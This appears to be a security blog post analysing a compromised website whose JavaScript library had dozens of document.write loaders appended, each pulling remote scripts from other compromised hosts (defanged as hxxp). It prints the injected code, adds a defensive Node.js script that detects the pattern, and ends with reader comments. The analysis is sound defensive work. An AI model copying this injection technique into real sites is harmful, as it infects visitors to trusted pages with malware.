• Hackers Understand the Value of Backups

    Hackers keep coming up with new tricks to obfuscate their malicious code and sneak it surreptitiously into benign websites. The trend keeps growing because websites are now the weakest link in the entire malware chain. A hacker discovers a vulnerability in a website, exploits it to inject malicious code, and voila: he now has a “trusted” website at his disposal. Lots of web surfers will drop by and, in turn, get infected with the hacker’s malicious code. This vicious cycle has become a very attractive modus operandi for the dark figures of the Internet.

    Overview

    This post shows an example of a trend we first blogged about a few months ago. We will concentrate on the way hackers use “backup sources” to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.

    Quite recently we blogged about how hackers use benign, useful JavaScript, hosted locally in accounts managed by the website owner or admin, to spread malware. Hackers inject malicious code right into the useful JavaScript snippets that do everything from displaying menu buttons to drop-down choices and much more. Because the site serves that script from its own domain, every visitor who loads a page that includes it runs the injected code. Take a look at our previous findings: here.

    An Example

    Every day we find websites infected with malicious code that follows the same principles. In fact, we now monitor over 1 million websites!

    Website name: ipac-bd.org
    Time of latest scan: 15:33:10 PDT on 2010/05/03

    In this example, the website was hosting JavaScript that had been compromised by a hacker. The hacker inserted a long run of script elements, written out with document.write, at the very end of the benign JavaScript used by the website, so they execute as soon as the library is parsed and the remote scripts load. It is likely that the website owner never saw this coming, and probably did not realize what was going on until the site was blacklisted.

    The “Backup” Strategy

    Take a look at the example below: the hacker clearly used multiple websites he had already compromised as the “loading points” for the malicious payload injected into the benign JavaScript. It is almost funny when one realizes how many websites this hacker has used as backups for his malicious code.

    In this example the hacker used 30 different infected websites to try to load his malicious code (29 distinct hosts survive in the listing below, referenced by 90 script tags in all). The frequency distribution of the infected websites the hacker used to distribute his malware is shown below. It seems that hackers understand the concept of a “backup strategy” well: if one of these hosts is cleaned up or taken offline, the script tags pointing at the others still deliver the payload, and the site only stops being dangerous once the injected code itself is removed. An interesting point to probe further would be why the frequency distribution of the infected sites looks the way it does.

    Frequency distribution of infected websites used in the transmission of malware.


    Example Code

    // Tail of the site's legitimate JavaScript (the end of the Prototype.js library).
    // Everything up to the closing brace of the Safari/KHTML block is benign.
        element.style.top    = top + 'px';
        element.style.left   = left + 'px';
        element.style.height = element._originalHeight;
        element.style.width  = element._originalWidth;
      }
    }

    // Safari returns margins on body which is incorrect if the child is absolutely
    // positioned.  For performance reasons, redefine Position.cumulativeOffset for
    // KHTML/WebKit only.
    if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
      Position.cumulativeOffset = function(element) {
        var valueT = 0, valueL = 0;
        do {
          valueT += element.offsetTop  || 0;
          valueL += element.offsetLeft || 0;
          if (element.offsetParent == document.body)
            if (Element.getStyle(element, 'position') == 'absolute') break;

          element = element.offsetParent;
        } while (element);

        return [valueL, valueT];
      }
    }

    // Injected by the attacker: appended after the end of the library. Each line
    // writes a script tag that pulls the payload from another compromised site
    // (URLs defanged with hxxp). The same host is usually repeated several times.
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
    document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
    document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
    document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
    document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
    document.write('<script src=hxxp://1-2-3security.com/images/products_housing.php ></script>');
    document.write('<script src=hxxp://devinjarvis.com/modlogan/index.php ></script>');
    document.write('<script src=hxxp://forumonly5.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
    document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
    document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
    document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
    document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
    document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
    document.write('<script src=hxxp://precilub.com/lang/favicon.php ></script>');
    document.write('<script src=hxxp://potaz.truelife.com/files/SQLyogTunnelz.php ></script>');
    document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
    document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
    document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
    document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
    document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
    document.write('<script src=hxxp://foot-jobss.co.cc/wp-includes/wp-config-sample.php ></script>');
    document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
    document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
    document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
    document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
    document.write('<script src=hxxp://almos-agroliga.ru/agroaddress/woodwork.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
    document.write('<script src=hxxp://jakojonevar.webphoto.ir/photos/restoreg.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
    document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
    document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
    document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
    document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
    document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
    document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
    document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
    document.write('<script src=hxxp://pracemladaboleslav.cz/wp-admin/license.php ></script>');
    document.write('<script src=hxxp://travelgenerators.com/Images/Dubai.php ></script>');
    document.write('<script src=hxxp://allocinema.net/wp-admin/wp-commentsrss2.php ></script>');
    document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
    document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
    document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
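
    A quick way to triage a file like the one above is to scan it for the appended loaders and tabulate the hosts they reference. The following Node.js script is an added example, not code from the original post or from Jaal: it finds document.write('<script src=...></script>') loaders line by line, checks whether they form a contiguous block at the end of the file (the pattern described above), and prints the host frequency distribution. The sample input is constructed from a few of the lines quoted above with the hxxp defanging kept; the regular expression also accepts live http/https URLs and quoted src attributes, and assumes one loader per line as in the listing.

```javascript
'use strict';

// Matches one attacker-style loader such as
//   document.write('<script src=hxxp://host/path.php ></script>');
// Accepts hxxp/http/https, optional quotes around src, and either quote style
// around the string (group 1 must close it). Group 2 is the URL, group 3 the host.
const LOADER_RE =
  /document\.write\(\s*(['"])<script\s+src=["']?(h(?:tt|xx)ps?:\/\/([^\s"'>\/]+)[^\s"'>]*)["']?\s*>\s*<\/script>\1\s*\)/;

// One record per loader line: 1-based line number, URL and lower-cased host.
function findInjectedLoaders(source) {
  const found = [];
  source.split(/\r?\n/).forEach((text, i) => {
    const m = LOADER_RE.exec(text);
    if (m) found.push({ line: i + 1, url: m[2], host: m[3].toLowerCase() });
  });
  return found;
}

// True when every line from the first loader to the end of the file is either a
// loader or blank, i.e. the tags were appended as one block after the library.
function isAppendedTail(source, loaders = findInjectedLoaders(source)) {
  if (loaders.length === 0) return false;
  const lines = source.split(/\r?\n/);
  const loaderLines = new Set(loaders.map((l) => l.line));
  for (let n = loaders[0].line; n <= lines.length; n++) {
    if (!loaderLines.has(n) && lines[n - 1].trim() !== '') return false;
  }
  return true;
}

// Host frequency distribution, most frequent first, ties broken by name.
function hostFrequency(loaders) {
  const counts = new Map();
  for (const { host } of loaders) counts.set(host, (counts.get(host) || 0) + 1);
  return [...counts].sort((a, b) => b[1] - a[1] || a[0].localeCompare(b[0]));
}

// Summary a responder can act on: how many tags, how many distinct hosts,
// whether they sit at the end of the file, and the per-host counts.
function scan(source) {
  const loaders = findInjectedLoaders(source);
  return {
    totalTags: loaders.length,
    distinctHosts: new Set(loaders.map((l) => l.host)).size,
    appendedAtEnd: isAppendedTail(source, loaders),
    firstInjectedLine: loaders.length ? loaders[0].line : null,
    frequency: hostFrequency(loaders),
  };
}

// Constructed sample (not the real infected file): the benign tail of a library,
// one harmless document.write, then a few of the loaders quoted in the post.
const SAMPLE = [
  "if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {",
  "  Position.cumulativeOffset = function(element) { return [0, 0]; }",
  "}",
  "document.write('<div id=\"footer\"></div>');",
  "document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');",
  "document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');",
  "document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');",
  "document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');",
  "document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');",
  "document.write('<script src=hxxp://1-2-3security.com/images/products_housing.php ></script>');",
].join('\n');

const report = scan(SAMPLE);
console.log(`${report.totalTags} loader tags, ${report.distinctHosts} distinct hosts,` +
            ` appended at end: ${report.appendedAtEnd} (first at line ${report.firstInjectedLine})`);
for (const [host, n] of report.frequency) console.log(String(n).padStart(4) + '  ' + host);
```

    To use it on a suspected file, replace SAMPLE with the file contents (for example fs.readFileSync(path, 'utf8')). A match on its own is not proof, since some legitimate scripts also write script tags, but a run of identical loaders after the library's last closing brace is exactly the pattern shown above, and the frequency table tells you which third-party hosts to report as compromised.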
    
    • […] every day, are not restricted to injecting just one malicious link inside benign web pages. Consider our post about how hackers inject links to multiple compromised sites when they infect new benign […]

      Posted by Lizamoon hack: Mass SQL injection – stopthehacker.com – Jaal, LLC on March 31st

    • What exactly was the purpose of fitting a wavy curve to that data? Are you trying to say that there are some URLs that were half one address and half another and appeared in the list a fractional number of times?

      No, I didn’t think so. You’re dealing with clear categories and integer occurrences; presenting that data as anything other than a bar graph is ludicrous I’m afraid.

      Posted by DaveK on April 1st

    • […] have blogged about hackers’ understanding of the necessity of failover in the past. In case any security organization identifies a website in this malware chain as being […]

      Posted by Domain Chaining Attacks – stopthehacker.com – Jaal, LLC on October 17th